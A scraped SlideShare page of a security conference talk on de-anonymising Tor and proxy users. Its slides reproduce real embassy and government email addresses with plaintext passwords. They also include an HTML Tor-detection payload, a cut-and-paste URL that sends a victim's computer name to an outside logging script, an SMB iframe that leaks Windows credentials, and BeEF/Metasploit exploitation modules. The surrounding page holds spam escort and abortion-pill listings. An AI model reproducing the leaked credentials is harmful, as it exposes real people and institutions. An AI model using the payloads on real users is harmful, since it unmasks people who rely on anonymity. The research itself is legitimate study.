SlideShare une entreprise Scribd logo
1  sur  25
1 Your logo here…
About Us ,[object Object]
SecTheory LLC - CEO
http://www.sectheory.com
http://ha.ckers.org – the lab
http://sla.ckers.org – the forum
Joshua “Jabra”Abraham
Rapid7 LLC - Security Researcher
http://www.rapid7.com
http://blog.spl0it.org2
De-Anonymizing You! 3 Why does this matter? Privacy advocacy People think they’re safe Privacy is not a guarantee.  It can be taken from you. True anonymity is actually extremely difficult to achieve!! So we decided to attack users instead of websites for once.
Why is Privacy Good? 4 Safety from trolls who want to drop docs Safer for political dissidents Safer for potential victims of violent crimes (women, children)… Allows people to be themselves (for good or bad) Safer for whistle blowers Increases freedoms
Why is Privacy Bad? 5 Haven for “evildoers” Allows them to attack easily Allows them to retreat easily Allows them to exfiltrate data easily Hurts law enforcement Prevents “social compact” rules of order from working in online contexts.
Either Way, Privacy is Broken 6 The ecosystem is too complex IP is the “gold standard” for tracking people down on the Internet, but what if we could do better? Let’s start with the basics of how people anonymize themselves.
How2 7 Basic anonymization guide Proxies: CGI proxies SOCKS Proxies Tor Hacked machines Freemail Hotmail Gmail Hushmail
Client Side Certificates 8 Good/Normal Use Improving the trust model Client: has the cert in the browser Servers: requires all clients have valid certs What if the client goes to another website with SSL? Browser defaults to send the public key
Client Side Certificates Well, could this be malicious? Sniff the public key Name of the system System/OS Username/Email of the client Location of the server Cert Issued / Expires 9 https://www.cs.uccs.edu/~cs591/secureWebAccess/fireFoxUserIDReq.png
Funny thing about usernames they often look like this: Common usernames: Administrator root [first].[last] [first]_[last] [first]-[last] handle … full name of the victim Interesting more on this later….
Breaking Tor 11 Kazakhstan Embassy in Egypt 213.131.64.229 kazaembpiramid Mongolian Embassy in USA 209.213.221.249 n.tumenbayar@mongolianembassy.us temp UK Visa Application Centre in Nepal 208.109.119.54 vfsuknepal@vfs-uk-np.com Password Defense Research & Development Organization Govt. Of India, Ministry of Defense jpsingh@drdo.com password+1 Indian Embassy in USA amb@indianembassy.org 1234 Iran Embassy in Ghana 217.172.99.19 iranemb_accra@mfa.gov.ir accra Iran Embassy in Kenya 217.172.99.19 iranemb_kenya@mfa.gov.ir kenya Hong Kong Liberal Party 202.123.79.164 miriamlau 123456 100 embassy passwords Breach proxy honeypots Open Proxies you trust? HackedTor.exe Setup the Client Tor node just logs everything We can play MiTM like Jay <imgsrc="http://dige6xxwpt2knqbv.onion/wink.gif" onload="alert('You are using Tor')" onerror="alert('You are not using tor')">
Browser Detection 12 Mr T Plugins History Screen Resolution BeEF VMware detection (IE only) Plugin detection  (Java, Flash and Quicktime) Setup script in Backtrack4 But…. The Cloud is the new Hotness!
Virtualization/Cloud Detection 13 VM Detection VMware QEMU VirtualBox Amazon EC2 Detection Identify each region Works on: Firefox and IE 6, 7 and 8 Works on Linux and Windows  Mac doesn’t work - 64 bit issue New BeEF Module! Leverage this knowledge in our attacks
Pwn Dem v0hns 14 Java on the client Malicious Java Applet Client running old/vulnerable software: Plugin and/or Browser  Metasploit exploit
BeEF to the MAX! New BeEF Modules TOR detection VM detection (Vmware, QEMU, VirtualBox and EC2) AJAX “Ping” Sweep Java Metasploit Payload Applet BeEFMetasploit Integration Autopwn / New Browser 0day Updated BeEF Modules Visited URLs (Alexa top 500) New version of BeEF coming… http://www.bindshell.net/beef 15
Real IP 16 Java Java internal IP Flash scp:// (winSCP) Word/pdf bugs itms: Already part of decloak.net
File System Enumeration 17 res:// timing res:// timing without JavaScript smbenum - “Wtf?”

Contenu connexe

En vedette

Quest Language Studies pp
Quest Language Studies ppQuest Language Studies pp
Quest Language Studies ppQuest
 
Visualize Life Without Boundaries!
Visualize Life Without Boundaries!Visualize Life Without Boundaries!
Visualize Life Without Boundaries!rriddick2
 
State Highway 6 Corridor Overlay Presentation 20090803
State Highway 6 Corridor Overlay Presentation   20090803State Highway 6 Corridor Overlay Presentation   20090803
State Highway 6 Corridor Overlay Presentation 20090803City of Manvel
 
090727 Final HMU Options
090727  Final HMU Options090727  Final HMU Options
090727 Final HMU OptionsCity of Manvel
 
Quest 2010 Brochure - English
Quest 2010 Brochure - EnglishQuest 2010 Brochure - English
Quest 2010 Brochure - EnglishQuest
 
Arabic brochure 2010
Arabic brochure 2010Arabic brochure 2010
Arabic brochure 2010Quest
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 

En vedette (19)

Quest Language Studies pp
Quest Language Studies ppQuest Language Studies pp
Quest Language Studies pp
 
Visualize Life Without Boundaries!
Visualize Life Without Boundaries!Visualize Life Without Boundaries!
Visualize Life Without Boundaries!
 
State Highway 6 Corridor Overlay Presentation 20090803
State Highway 6 Corridor Overlay Presentation   20090803State Highway 6 Corridor Overlay Presentation   20090803
State Highway 6 Corridor Overlay Presentation 20090803
 
090727 Final HMU Options
090727  Final HMU Options090727  Final HMU Options
090727 Final HMU Options
 
Quest 2010 Brochure - English
Quest 2010 Brochure - EnglishQuest 2010 Brochure - English
Quest 2010 Brochure - English
 
Arabic brochure 2010
Arabic brochure 2010Arabic brochure 2010
Arabic brochure 2010
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Presentacion Rss
Presentacion RssPresentacion Rss
Presentacion Rss
 

Similaire à Unmasking You

Data Privacy for Activists
Data Privacy for ActivistsData Privacy for Activists
Data Privacy for ActivistsGreg Stromire
 
Unmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouUnmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouE Hacking
 
OpenID Security
OpenID SecurityOpenID Security
OpenID Securityeugenet
 
Computer And Internet Security
Computer And Internet SecurityComputer And Internet Security
Computer And Internet SecurityAshley Zimmerman
 
Computer And Internet Security
Computer And Internet SecurityComputer And Internet Security
Computer And Internet SecurityJFashant
 
The Veterans' Guide to Protecting Your Privacy and Staying Safe Online
The Veterans' Guide to Protecting Your Privacy and Staying Safe OnlineThe Veterans' Guide to Protecting Your Privacy and Staying Safe Online
The Veterans' Guide to Protecting Your Privacy and Staying Safe OnlineJinger Jarrett
 
Social Engineering: Protecting Yourself on the Campus Network
Social Engineering: Protecting Yourself on the Campus NetworkSocial Engineering: Protecting Yourself on the Campus Network
Social Engineering: Protecting Yourself on the Campus Networkthowell
 
Year 7 - Week 5 esafety
Year 7 - Week 5   esafetyYear 7 - Week 5   esafety
Year 7 - Week 5 esafetyteachesict
 
Internet Safety & Security
Internet Safety & Security Internet Safety & Security
Internet Safety & Security Austin Stroud
 
hamad.pwrpoint.pdf
hamad.pwrpoint.pdfhamad.pwrpoint.pdf
hamad.pwrpoint.pdfhmooodes115
 
44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?44CON
 
The life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleThe life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleJarrod Overson
 
Cyberhunter solutions cyber security toronto.pdf
Cyberhunter solutions cyber security toronto.pdfCyberhunter solutions cyber security toronto.pdf
Cyberhunter solutions cyber security toronto.pdfCyberhunter Cyber Security
 
Protecting Your Privacy: Cyberspace Security, Real World Safety
Protecting Your Privacy: Cyberspace Security, Real World SafetyProtecting Your Privacy: Cyberspace Security, Real World Safety
Protecting Your Privacy: Cyberspace Security, Real World SafetyAEGILITY
 
Employee Security Awareness Program
Employee Security Awareness ProgramEmployee Security Awareness Program
Employee Security Awareness Programdavidcurriecia
 
Passwords in the Internet Age - Jim Salter
Passwords in the Internet Age - Jim SalterPasswords in the Internet Age - Jim Salter
Passwords in the Internet Age - Jim SalterIT-oLogy
 
Os Nightingale
Os NightingaleOs Nightingale
Os Nightingaleoscon2007
 
Protect Yourself From Internet Pests
Protect Yourself From Internet PestsProtect Yourself From Internet Pests
Protect Yourself From Internet Pestspeterhitch
 

Similaire à Unmasking You (20)

Data Privacy for Activists
Data Privacy for ActivistsData Privacy for Activists
Data Privacy for Activists
 
Unmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouUnmasking or De-Anonymizing You
Unmasking or De-Anonymizing You
 
OpenID Security
OpenID SecurityOpenID Security
OpenID Security
 
Computer And Internet Security
Computer And Internet SecurityComputer And Internet Security
Computer And Internet Security
 
Computer And Internet Security
Computer And Internet SecurityComputer And Internet Security
Computer And Internet Security
 
The Veterans' Guide to Protecting Your Privacy and Staying Safe Online
The Veterans' Guide to Protecting Your Privacy and Staying Safe OnlineThe Veterans' Guide to Protecting Your Privacy and Staying Safe Online
The Veterans' Guide to Protecting Your Privacy and Staying Safe Online
 
Social Engineering: Protecting Yourself on the Campus Network
Social Engineering: Protecting Yourself on the Campus NetworkSocial Engineering: Protecting Yourself on the Campus Network
Social Engineering: Protecting Yourself on the Campus Network
 
How to hack or what is ethical hacking
How to hack or what is ethical hackingHow to hack or what is ethical hacking
How to hack or what is ethical hacking
 
Year 7 - Week 5 esafety
Year 7 - Week 5   esafetyYear 7 - Week 5   esafety
Year 7 - Week 5 esafety
 
Security Primer
Security PrimerSecurity Primer
Security Primer
 
Internet Safety & Security
Internet Safety & Security Internet Safety & Security
Internet Safety & Security
 
hamad.pwrpoint.pdf
hamad.pwrpoint.pdfhamad.pwrpoint.pdf
hamad.pwrpoint.pdf
 
44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?
 
The life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleThe life of breached data and the attack lifecycle
The life of breached data and the attack lifecycle
 
Cyberhunter solutions cyber security toronto.pdf
Cyberhunter solutions cyber security toronto.pdfCyberhunter solutions cyber security toronto.pdf
Cyberhunter solutions cyber security toronto.pdf
 
Protecting Your Privacy: Cyberspace Security, Real World Safety
Protecting Your Privacy: Cyberspace Security, Real World SafetyProtecting Your Privacy: Cyberspace Security, Real World Safety
Protecting Your Privacy: Cyberspace Security, Real World Safety
 
Employee Security Awareness Program
Employee Security Awareness ProgramEmployee Security Awareness Program
Employee Security Awareness Program
 
Passwords in the Internet Age - Jim Salter
Passwords in the Internet Age - Jim SalterPasswords in the Internet Age - Jim Salter
Passwords in the Internet Age - Jim Salter
 
Os Nightingale
Os NightingaleOs Nightingale
Os Nightingale
 
Protect Yourself From Internet Pests
Protect Yourself From Internet PestsProtect Yourself From Internet Pests
Protect Yourself From Internet Pests
 

Dernier

Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...
Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...
Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...lizamodels9
 
Monte Carlo simulation : Simulation using MCSM
Monte Carlo simulation : Simulation using MCSMMonte Carlo simulation : Simulation using MCSM
Monte Carlo simulation : Simulation using MCSMRavindra Nath Shukla
 
Russian Call Girls In Gurgaon ❤️8448577510 ⊹Best Escorts Service In 24/7 Delh...
Russian Call Girls In Gurgaon ❤️8448577510 ⊹Best Escorts Service In 24/7 Delh...Russian Call Girls In Gurgaon ❤️8448577510 ⊹Best Escorts Service In 24/7 Delh...
Russian Call Girls In Gurgaon ❤️8448577510 ⊹Best Escorts Service In 24/7 Delh...lizamodels9
 
KYC-Verified Accounts: Helping Companies Handle Challenging Regulatory Enviro...
KYC-Verified Accounts: Helping Companies Handle Challenging Regulatory Enviro...KYC-Verified Accounts: Helping Companies Handle Challenging Regulatory Enviro...
KYC-Verified Accounts: Helping Companies Handle Challenging Regulatory Enviro...Any kyc Account
 
Call Girls In Panjim North Goa 9971646499 Genuine Service
Call Girls In Panjim North Goa 9971646499 Genuine ServiceCall Girls In Panjim North Goa 9971646499 Genuine Service
Call Girls In Panjim North Goa 9971646499 Genuine Serviceritikaroy0888
 
M.C Lodges -- Guest House in Jhang.
M.C Lodges --  Guest House in Jhang.M.C Lodges --  Guest House in Jhang.
M.C Lodges -- Guest House in Jhang.Aaiza Hassan
 
👉Chandigarh Call Girls 👉9878799926👉Just Call👉Chandigarh Call Girl In Chandiga...
👉Chandigarh Call Girls 👉9878799926👉Just Call👉Chandigarh Call Girl In Chandiga...👉Chandigarh Call Girls 👉9878799926👉Just Call👉Chandigarh Call Girl In Chandiga...
👉Chandigarh Call Girls 👉9878799926👉Just Call👉Chandigarh Call Girl In Chandiga...rajveerescorts2022
 
Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...
Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...
Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...Dipal Arora
 
HONOR Veterans Event Keynote by Michael Hawkins
HONOR Veterans Event Keynote by Michael HawkinsHONOR Veterans Event Keynote by Michael Hawkins
HONOR Veterans Event Keynote by Michael HawkinsMichael W. Hawkins
 
Call Girls Hebbal Just Call 👗 7737669865 👗 Top Class Call Girl Service Bangalore
Call Girls Hebbal Just Call 👗 7737669865 👗 Top Class Call Girl Service BangaloreCall Girls Hebbal Just Call 👗 7737669865 👗 Top Class Call Girl Service Bangalore
Call Girls Hebbal Just Call 👗 7737669865 👗 Top Class Call Girl Service Bangaloreamitlee9823
 
7.pdf This presentation captures many uses and the significance of the number...
7.pdf This presentation captures many uses and the significance of the number...7.pdf This presentation captures many uses and the significance of the number...
7.pdf This presentation captures many uses and the significance of the number...Paul Menig
 
Boost the utilization of your HCL environment by reevaluating use cases and f...
Boost the utilization of your HCL environment by reevaluating use cases and f...Boost the utilization of your HCL environment by reevaluating use cases and f...
Boost the utilization of your HCL environment by reevaluating use cases and f...Roland Driesen
 
The Path to Product Excellence: Avoiding Common Pitfalls and Enhancing Commun...
The Path to Product Excellence: Avoiding Common Pitfalls and Enhancing Commun...The Path to Product Excellence: Avoiding Common Pitfalls and Enhancing Commun...
The Path to Product Excellence: Avoiding Common Pitfalls and Enhancing Commun...Aggregage
 
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756dollysharma2066
 
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service Available
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service AvailableCall Girls Pune Just Call 9907093804 Top Class Call Girl Service Available
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service AvailableDipal Arora
 
Ensure the security of your HCL environment by applying the Zero Trust princi...
Ensure the security of your HCL environment by applying the Zero Trust princi...Ensure the security of your HCL environment by applying the Zero Trust princi...
Ensure the security of your HCL environment by applying the Zero Trust princi...Roland Driesen
 
Dr. Admir Softic_ presentation_Green Club_ENG.pdf
Dr. Admir Softic_ presentation_Green Club_ENG.pdfDr. Admir Softic_ presentation_Green Club_ENG.pdf
Dr. Admir Softic_ presentation_Green Club_ENG.pdfAdmir Softic
 

Dernier (20)

Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...
Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...
Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...
 
Mifty kit IN Salmiya (+918133066128) Abortion pills IN Salmiyah Cytotec pills
Mifty kit IN Salmiya (+918133066128) Abortion pills IN Salmiyah Cytotec pillsMifty kit IN Salmiya (+918133066128) Abortion pills IN Salmiyah Cytotec pills
Mifty kit IN Salmiya (+918133066128) Abortion pills IN Salmiyah Cytotec pills
 
Monte Carlo simulation : Simulation using MCSM
Monte Carlo simulation : Simulation using MCSMMonte Carlo simulation : Simulation using MCSM
Monte Carlo simulation : Simulation using MCSM
 
Russian Call Girls In Gurgaon ❤️8448577510 ⊹Best Escorts Service In 24/7 Delh...
Russian Call Girls In Gurgaon ❤️8448577510 ⊹Best Escorts Service In 24/7 Delh...Russian Call Girls In Gurgaon ❤️8448577510 ⊹Best Escorts Service In 24/7 Delh...
Russian Call Girls In Gurgaon ❤️8448577510 ⊹Best Escorts Service In 24/7 Delh...
 
KYC-Verified Accounts: Helping Companies Handle Challenging Regulatory Enviro...
KYC-Verified Accounts: Helping Companies Handle Challenging Regulatory Enviro...KYC-Verified Accounts: Helping Companies Handle Challenging Regulatory Enviro...
KYC-Verified Accounts: Helping Companies Handle Challenging Regulatory Enviro...
 
Call Girls In Panjim North Goa 9971646499 Genuine Service
Call Girls In Panjim North Goa 9971646499 Genuine ServiceCall Girls In Panjim North Goa 9971646499 Genuine Service
Call Girls In Panjim North Goa 9971646499 Genuine Service
 
M.C Lodges -- Guest House in Jhang.
M.C Lodges --  Guest House in Jhang.M.C Lodges --  Guest House in Jhang.
M.C Lodges -- Guest House in Jhang.
 
👉Chandigarh Call Girls 👉9878799926👉Just Call👉Chandigarh Call Girl In Chandiga...
👉Chandigarh Call Girls 👉9878799926👉Just Call👉Chandigarh Call Girl In Chandiga...👉Chandigarh Call Girls 👉9878799926👉Just Call👉Chandigarh Call Girl In Chandiga...
👉Chandigarh Call Girls 👉9878799926👉Just Call👉Chandigarh Call Girl In Chandiga...
 
Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...
Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...
Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...
 
HONOR Veterans Event Keynote by Michael Hawkins
HONOR Veterans Event Keynote by Michael HawkinsHONOR Veterans Event Keynote by Michael Hawkins
HONOR Veterans Event Keynote by Michael Hawkins
 
Call Girls Hebbal Just Call 👗 7737669865 👗 Top Class Call Girl Service Bangalore
Call Girls Hebbal Just Call 👗 7737669865 👗 Top Class Call Girl Service BangaloreCall Girls Hebbal Just Call 👗 7737669865 👗 Top Class Call Girl Service Bangalore
Call Girls Hebbal Just Call 👗 7737669865 👗 Top Class Call Girl Service Bangalore
 
Forklift Operations: Safety through Cartoons
Forklift Operations: Safety through CartoonsForklift Operations: Safety through Cartoons
Forklift Operations: Safety through Cartoons
 
VVVIP Call Girls In Greater Kailash ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Greater Kailash ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...VVVIP Call Girls In Greater Kailash ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Greater Kailash ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
 
7.pdf This presentation captures many uses and the significance of the number...
7.pdf This presentation captures many uses and the significance of the number...7.pdf This presentation captures many uses and the significance of the number...
7.pdf This presentation captures many uses and the significance of the number...
 
Boost the utilization of your HCL environment by reevaluating use cases and f...
Boost the utilization of your HCL environment by reevaluating use cases and f...Boost the utilization of your HCL environment by reevaluating use cases and f...
Boost the utilization of your HCL environment by reevaluating use cases and f...
 
The Path to Product Excellence: Avoiding Common Pitfalls and Enhancing Commun...
The Path to Product Excellence: Avoiding Common Pitfalls and Enhancing Commun...The Path to Product Excellence: Avoiding Common Pitfalls and Enhancing Commun...
The Path to Product Excellence: Avoiding Common Pitfalls and Enhancing Commun...
 
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
 
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service Available
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service AvailableCall Girls Pune Just Call 9907093804 Top Class Call Girl Service Available
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service Available
 
Ensure the security of your HCL environment by applying the Zero Trust princi...
Ensure the security of your HCL environment by applying the Zero Trust princi...Ensure the security of your HCL environment by applying the Zero Trust princi...
Ensure the security of your HCL environment by applying the Zero Trust princi...
 
Dr. Admir Softic_ presentation_Green Club_ENG.pdf
Dr. Admir Softic_ presentation_Green Club_ENG.pdfDr. Admir Softic_ presentation_Green Club_ENG.pdf
Dr. Admir Softic_ presentation_Green Club_ENG.pdf
 

Unmasking You

  • 1. 1 Your logo here…
  • 2.
  • 8. Rapid7 LLC - Security Researcher
  • 11. De-Anonymizing You! 3 Why does this matter? Privacy advocacy People think they’re safe Privacy is not a guarantee. It can be taken from you. True anonymity is actually extremely difficult to achieve!! So we decided to attack users instead of websites for once.
  • 12. Why is Privacy Good? 4 Safety from trolls who want to drop docs Safer for political dissidents Safer for potential victims of violent crimes (women, children)… Allows people to be themselves (for good or bad) Safer for whistle blowers Increases freedoms
  • 13. Why is Privacy Bad? 5 Haven for “evildoers” Allows them to attack easily Allows them to retreat easily Allows them to exfiltrate data easily Hurts law enforcement Prevents “social compact” rules of order from working in online contexts.
  • 14. Either Way, Privacy is Broken 6 The ecosystem is too complex IP is the “gold standard” for tracking people down on the Internet, but what if we could do better? Let’s start with the basics of how people anonymize themselves.
  • 15. How2 7 Basic anonymization guide Proxies: CGI proxies SOCKS Proxies Tor Hacked machines Freemail Hotmail Gmail Hushmail
  • 16. Client Side Certificates 8 Good/Normal Use Improving the trust model Client: has the cert in the browser Servers: requires all clients have valid certs What if the client goes to another website with SSL? Browser defaults to send the public key
  • 17. Client Side Certificates Well, could this be malicious? Sniff the public key Name of the system System/OS Username/Email of the client Location of the server Cert Issued / Expires 9 https://www.cs.uccs.edu/~cs591/secureWebAccess/fireFoxUserIDReq.png
  • 18. Funny thing about usernames they often look like this: Common usernames: Administrator root [first].[last] [first]_[last] [first]-[last] handle … full name of the victim Interesting more on this later….
  • 19. Breaking Tor 11 Kazakhstan Embassy in Egypt 213.131.64.229 kazaembpiramid Mongolian Embassy in USA 209.213.221.249 n.tumenbayar@mongolianembassy.us temp UK Visa Application Centre in Nepal 208.109.119.54 vfsuknepal@vfs-uk-np.com Password Defense Research & Development Organization Govt. Of India, Ministry of Defense jpsingh@drdo.com password+1 Indian Embassy in USA amb@indianembassy.org 1234 Iran Embassy in Ghana 217.172.99.19 iranemb_accra@mfa.gov.ir accra Iran Embassy in Kenya 217.172.99.19 iranemb_kenya@mfa.gov.ir kenya Hong Kong Liberal Party 202.123.79.164 miriamlau 123456 100 embassy passwords Breach proxy honeypots Open Proxies you trust? HackedTor.exe Setup the Client Tor node just logs everything We can play MiTM like Jay <imgsrc="http://dige6xxwpt2knqbv.onion/wink.gif" onload="alert('You are using Tor')" onerror="alert('You are not using tor')">
  • 20. Browser Detection 12 Mr T Plugins History Screen Resolution BeEF VMware detection (IE only) Plugin detection (Java, Flash and Quicktime) Setup script in Backtrack4 But…. The Cloud is the new Hotness!
  • 21. Virtualization/Cloud Detection 13 VM Detection VMware QEMU VirtualBox Amazon EC2 Detection Identify each region Works on: Firefox and IE 6, 7 and 8 Works on Linux and Windows Mac doesn’t work - 64 bit issue New BeEF Module! Leverage this knowledge in our attacks
  • 22. Pwn Dem v0hns 14 Java on the client Malicious Java Applet Client running old/vulnerable software: Plugin and/or Browser Metasploit exploit
  • 23. BeEF to the MAX! New BeEF Modules TOR detection VM detection (Vmware, QEMU, VirtualBox and EC2) AJAX “Ping” Sweep Java Metasploit Payload Applet BeEFMetasploit Integration Autopwn / New Browser 0day Updated BeEF Modules Visited URLs (Alexa top 500) New version of BeEF coming… http://www.bindshell.net/beef 15
  • 24. Real IP 16 Java Java internal IP Flash scp:// (winSCP) Word/pdf bugs itms: Already part of decloak.net
  • 25. File System Enumeration 17 res:// timing res:// timing without JavaScript smbenum - “Wtf?”
  • 26. Usernames and Computer Names! 18 But seriously – that’s just terrible, let’s just get the username and computer name directly! Cut and paste http://ha.ckers.org/log.cgi?rAnd0mcr4p%aPpdAta%2hide%coMpuTeRnaME%th3v4rz SMB <iframesrc="file:///2.2.2.2amp;quot;> </iframe>
  • 27. SMBenum 19 SMB enum only finds certain types of files and only if known prior to testing SMB enum could also gather usernames through brute force Usernames + res:// timing could gather programs that smbenum alone couldn’t
  • 33.
  • 36.
  • 39. Final version of Slides and Demos

Notes de l'éditeur

  1. Jabra (maybe need a picture)
  2. Jabra and time check
  3. Robert & Jabra says Google is big brother